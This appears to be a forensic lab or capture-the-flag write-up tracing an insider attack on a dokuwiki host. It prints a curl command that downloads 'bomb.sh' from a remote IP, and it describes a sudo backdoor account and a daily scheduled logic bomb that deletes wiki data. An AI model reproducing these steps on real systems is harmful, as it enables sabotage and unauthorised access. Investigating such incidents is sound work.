A user installed a package named dokuwiki using this full command /usr/bin/apt install dokuwiki at Dec 28, 2022 06:17:30. The package was installed in /home/cybert directory. After installing the package, the it-admin user was created and given sudo (root) privileges at Dec 28 06:27:34 in sudoers file. At Dec 28 06:29:14 bomb.sh was opened via vi text editor. bomb.sh was created using this command curl 10.10.158.38:8080/bomb.sh --output bomb.sh and it was from the web. Curl command fetches data from URL. The bomb.sh file was opened in vim and save as in /bin/os-update.sh on Dec 28 06:29 and delete the original file. This os-update is run everyday at 8AM. This file has a malicious command that delete the /var/lib/dokuwiki if it-admin has not logged for 90 days.